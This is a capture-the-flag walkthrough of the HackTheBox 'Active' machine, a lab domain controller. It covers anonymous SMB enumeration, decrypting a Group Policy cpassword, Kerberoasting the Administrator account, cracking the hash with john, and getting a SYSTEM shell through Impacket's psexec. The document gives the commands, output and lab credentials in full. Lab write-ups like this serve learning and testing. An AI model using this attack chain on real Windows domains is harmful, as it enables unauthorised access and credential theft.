Active is an easy level Windows machine on HacktheBox which starts with enumerating an SMB share on a domain controller to find an encrypted gpp password, which we can decrypt and get access to the domain as a low priveleged user, we then find that the Administrator account can be Kerberoasted, giving us full access to the DC.
Enumeration
Nmap shows us
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Nmap 7.93 scan initiated Wed Jan 25 21:02:22 2023 as: nmap -sC -sV -p- -oN nmap.out 10.10.10.100N
map scan report for active.htb (10.10.10.100)
Host is up (0.049s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-26 02:03:19Z)135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC4
9154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPCService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Our trusty nmap script gave us tons of info, the open ports (53,88,139,389,445) tell us we will be attacking a domain controller, which nmap has found is named DC.active.htb, so we’ll add DC.active.htb and active.htb to our /etc/hosts file. We can poke around SMB to check if there’s any non-standard shares, we can expect to atleast see SYSVOL, NETLOGON, and some admin shares (though we probably won’t be able to read the contents). We can use smbclient -l to list the shares which shows us:
1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient -L //10.10.10.100/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
If we try to go inside any of these, we get tree connect failed: NT_STATUS_ACCESS_DENIED
except for the Replication share. Let’s download the entire share to our machine with:
1
2
3
4
5
6
7
└─$ smbclient //10.10.10.100/Replication/
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
There’s not much, but we do find a Groups.xml file, which contains a username and encrypted “cpassword”. Sysadmins used to be able to set user passwords via Group Policy with cpasswords, until Microsoft patched it in 2014 and blocked usage of the cpassword in new policies, which is cool, but they also leaked the decryption key on their support site. We can use a default kali tool “gpp-decrypt” to decrypt the password. Anyways this is what the groups.xml file looks like.
1
2
3
└─$ cat /home/kali/htb/Active/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>
Decrypting the cpassword gives us the credentials SVC_TGS:GPPstillStandingStrong2k18, which lets us grab the user flag with
1
smbclient //10.10.10.100/Users/ -U "SVC_TGS"
We can also use some tools from the Impacket suite to interact with the domain.
1
2
3
4
5
6
7
./GetADUsers.py -all active.htb/svc_tgs:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Querying active.htb for information about domain.Name Email PasswordLastSet LastLogon -------------------- ----------------------------- ------------------- -------------------
Administrator 2018-07-18 15:06:40.351723 2023-01-25 18:58:13.159750
Guest <never> <never>
krbtgt 2018-07-18 14:50:36.972031 <never> SVC_TGS 2018-07-18 16:14:38.402764 2023-01-26 12:25:29.633317
We can see if any users are kerberoastable by requesting service tickets from the domain controller with the GetUserSPNS.py script.
1
./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Which gives us an administrator hash we can crack using john.
1
2
john hash.txt --show
?:Ticketmaster1968
We can then use psexec to get a shell with these credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
./psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file TACcfYCj.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service xJWe on 10.10.10.100.....
[*] Starting service xJWe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system